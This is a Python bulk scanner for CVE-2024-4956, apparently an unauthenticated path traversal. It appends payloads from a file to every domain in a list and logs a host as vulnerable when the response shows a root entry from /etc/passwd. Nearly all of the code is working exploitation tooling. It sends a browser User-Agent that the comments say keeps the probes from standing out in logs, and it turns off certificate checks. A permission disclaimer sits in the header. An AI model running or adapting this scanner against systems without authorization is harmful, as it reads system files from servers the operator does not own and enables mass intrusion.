CVE-2024-4956-scanner.py
# [CVE-2024-4956] Unauthenticated Path Traversal Bulk Scanner
# Intended only for educational use and for testing in corporate environments.
# https://twitter.com/nav1n0x/ https://github.com/ifconfig-me takes no responsibility for the code, use at your own risk.
# Do not attack a target you don't have permission to engage with.
import asyncio
import aiohttp
import argparse
from colorama import init, Fore, Style
# --- Pacing and timeout settings -------------------------------------------
RATE_LIMIT = 15  # NOTE(review): not referenced anywhere in the visible code
TIMEOUT = 3  # seconds; handed to the GET call in send_request
DELAY = 0.5  # seconds (500 ms)

# Running count of responses that matched the success marker; send_request
# increments it and main prints it in the final summary.
successful_attempts = 0

# colorama: reset colour and style automatically after each print call.
init(autoreset=True)

# Static headers attached to every request.
# The User-Agent mimics desktop Chrome, so on the receiving side these probes
# cannot be singled out in access logs by the UA string alone.
# NOTE(review): "br" is advertised in Accept-Encoding; aiohttp needs a brotli
# package to decode such responses -- confirm it is installed, otherwise a
# brotli-encoded reply ends up in send_request's generic exception branch.
headers = {
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/121.0.6167.160 Safari/537.36"
    ),
    "Accept": (
        "text/html,application/xhtml+xml,application/xml;q=0.9,"
        "image/avif,image/webp,image/apng,*/*;q=0.8,"
        "application/signed-exchange;v=b3;q=0.7"
    ),
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Connection": "close",
}

# Start-up banner, printed once when the module is loaded.
ascii_art = """
____
____ _____ ___ _/_ | ____
/ \\\\__ \\\\ \\/ /| |/ \\
| | \\/ __ \\\\ / | | | \\
|___| (____ /\\_/ |___|___| /
\\/ \\/ \\/ CVE-2024-4956-scanner
"""
print(f"{Fore.CYAN}{ascii_art}{Style.RESET_ALL}")
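async def send_request(session, domain, payload, index, total):
    """Probe one domain/payload pair and record the domain on a match.

    Args:
        session: aiohttp client session used to issue the GET request.
        domain: Base URL including the scheme; the payload is appended
            after a single "/".
        payload: Path string appended to the domain exactly as given.
        index: Zero-based position of this request (progress line only).
        total: Total number of requests (progress line only).

    Side effects:
        Prints a one-line status, appends a matching domain to
        "successful_urls.txt" and increments the module-level
        ``successful_attempts`` counter.
    """
    global successful_attempts
    import re  # local import so the block does not depend on file-level edits

    url = f"{domain}/{payload}"
    print(f"Testing URL {index + 1}/{total}: {domain}", end='', flush=True)
    try:
        # NOTE(review): ssl=False disables certificate verification, so the
        # responding host is not authenticated; a result is only as
        # trustworthy as the network path it travelled over.
        async with session.get(
            url,
            headers=headers,
            ssl=False,
            # A bare number as timeout is deprecated in aiohttp; use the
            # explicit ClientTimeout object instead.
            timeout=aiohttp.ClientTimeout(total=TIMEOUT),
        ) as response:
            # errors="replace": a binary or mis-declared body must not raise
            # a decode error that would be reported as a negative result.
            content = await response.text(errors="replace")

        # A bare "root:" substring also matches ordinary pages (docs, error
        # text). Require the passwd-style entry with uid 0 / gid 0 to cut
        # false positives in the findings file.
        if re.search(r"root:[^:\s]*:0:0:", content):
            with open("successful_urls.txt", "a", encoding="utf-8") as file:
                file.write(f"{domain}\n")
            successful_attempts += 1
            print(f" {Fore.GREEN}{Style.BRIGHT}Success")
        else:
            print(f" {Fore.RED}{Style.BRIGHT}Fail")
    except asyncio.TimeoutError:
        print(f" {Fore.RED}{Style.BRIGHT}Timeout")
    except Exception as e:
        # Connection, decoding or file errors are not a negative finding:
        # label them separately so an unreachable host is not read as
        # "not affected" when the results are reviewed.
        print(f" {Fore.RED}{Style.BRIGHT}Error ({type(e).__name__})")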
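async def main(domains_file, payloads_file):
    """Run every payload against every domain, one request at a time.

    Args:
        domains_file: Path to a text file with one domain or base URL per line.
        payloads_file: Path to a text file with one payload per line.

    Blank lines in either file are skipped so they are neither counted as
    targets nor turned into requests against an empty host or path. Requests
    are issued sequentially with a pause of ``DELAY`` seconds between them.
    """
    # Read both input files before opening the HTTP session.
    with open(domains_file, "r") as file:
        domains = [line.strip() for line in file if line.strip()]
    with open(payloads_file, "r") as file:
        # Payloads are used exactly as written; only empty lines are dropped.
        payloads = [line for line in file.read().splitlines() if line.strip()]

    total_targets = len(domains) * len(payloads)
    print(f"{Fore.BLUE}Total targets to scan: {total_targets}")

    index = 0
    async with aiohttp.ClientSession() as session:
        for domain in domains:
            # Entries without a scheme default to plain HTTP; the check is
            # case-insensitive so "HTTPS://host" is not prefixed again.
            if not domain.lower().startswith(("http://", "https://")):
                domain = 'http://' + domain
            for payload in payloads:
                await send_request(session, domain, payload, index, total_targets)
                index += 1
                # Apply the configured pause between requests; the original
                # declared DELAY but never used it, so the scan ran unthrottled
                # against the tested hosts.
                if index < total_targets:
                    await asyncio.sleep(DELAY)

    print(f"{Fore.BLUE}Task execution completed.")
    print(f"{Fore.GREEN}Successful attempts: {successful_attempts}/{total_targets}")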
if __name__ == "__main__":
    # Command-line entry point: both input files are mandatory.
    parser = argparse.ArgumentParser(
        description="Scan domains with multiple payloads",
    )
    for short_flag, long_flag, help_text in (
        ("-d", "--domains", "File containing list of domains"),
        ("-p", "--payloads", "File containing list of payloads"),
    ):
        parser.add_argument(short_flag, long_flag, required=True, help=help_text)
    args = parser.parse_args()

    # Hand the two file paths to the async driver and run it to completion.
    asyncio.run(main(args.domains, args.payloads))